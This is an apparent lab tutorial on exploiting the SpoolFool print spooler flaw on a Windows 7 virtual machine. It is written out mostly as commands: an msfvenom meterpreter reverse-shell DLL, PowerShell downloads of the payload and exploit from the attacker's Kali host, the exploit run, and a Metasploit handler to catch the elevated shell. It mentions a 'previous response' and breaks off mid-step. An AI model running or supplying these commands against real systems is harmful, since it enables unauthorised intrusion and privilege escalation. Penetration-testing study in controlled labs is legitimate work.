Exploiting Windows Machine via SpoolFool Vulnerability

Objective: To demonstrate how to exploit a Windows machine via SpoolFool vulnerability
and gain a reverse shell with escalated privileges.


● A Windows 7 machine in a virtual environment (VirtualBox)
● A Kali Linux machine in a virtual environment (VirtualBox)
● A working internet connection
● SpoolFool PoC (https://github.com/ly4k/SpoolFool) downloaded on the Kali Linux

  1. First, we will need to download the PoC created by Oliver Lyak from the GitHub link
    provided in the previous response.
  2. Open a terminal in Kali Linux and navigate to the directory where you have
    downloaded the SpoolFool files.
  3. Use the command ls to check the files available in the directory. You should see an
    EXE file and a pre-made DLL payload.
  4. Next, we will need to compromise the Windows 7 machine and gain a reverse shell.
    For this, you can use any method of your choice such as Metasploit or manual
    exploitation. Once you have a reverse shell, you can check the current user’s
    permissions by running the command whoami /user /groups
  5. Now, we will create a custom DLL using msfvenom. For this exercise, we will use the
    meterpreter injection as the payload. Run the command msfvenom -p
    windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IP_of_kali_machine
    LPORT=9501 > reverse_64bit.dll (replace IP_of_kali_machine with the IP address of
    your Kali Linux machine)
  6. Once the DLL is generated, we need to upload it to the Windows 7 machine. We
    recommend using the C:\Users\Public directory for this. You can start a python
    server and host the SpoolFool.exe and reverse_64bit.dll files in the same location.
    This can be done using the powershell module IWR by running the command
    powershell -c iwr http://IP_of_kali_machine/reverse_64bit.dll -outf
    \Users\Public\reverse.dll and powershell -c iwr
    http://IP_of_kali_machine/SpoolFool.exe -outf \Users\Public\SpoolFool.exe (replace
    IP_of_kali_machine with the IP address of your Kali Linux machine)
  7. Now, we can run the exploit by using the command SpoolFool.exe -dll reverse.dll in
    the command prompt on the Windows 7 machine. Before running this command,
    make sure to set up multi/handler in msfconsole by running the command use
    multi/handler, set payload windows/x64/meterpreter/reverse_tcp, set LHOST
    IP_of_kali_machine and set LPORT 9501.
  8. Once the exploit is executed, you will notice that a new directory has been created in
    %temp%\d5f5….{random name} and a reparse point has been created to write into
    the print driver directory C:\Windows\system32\spool\DRIVERS\x64\4.
  9. The directory should now exist and the DLL should be saved in it, indicating a
    successful exploit. You should also see that the directory is writable by everyone.
  10. Finally, start the multi/handler in msfconsole by running the command run
  11. Now you should have a meterpreter session on the Windows 7 machine. To check
    the current user’s permissions and to confirm that the privileges have been

Note: This exercise is only for educational purposes and should be carried out in a controlled
and secured lab environment.

● VirtualBox: https://www.virtualbox.org/wiki/Downloads
● Kali Linux: https://www.kali.org/downloads/
● https://www.hackingarticles.in/windows-privilege-escalation-spoolfool/

Open chat
Hello 👋.
Tell me, how can I help you?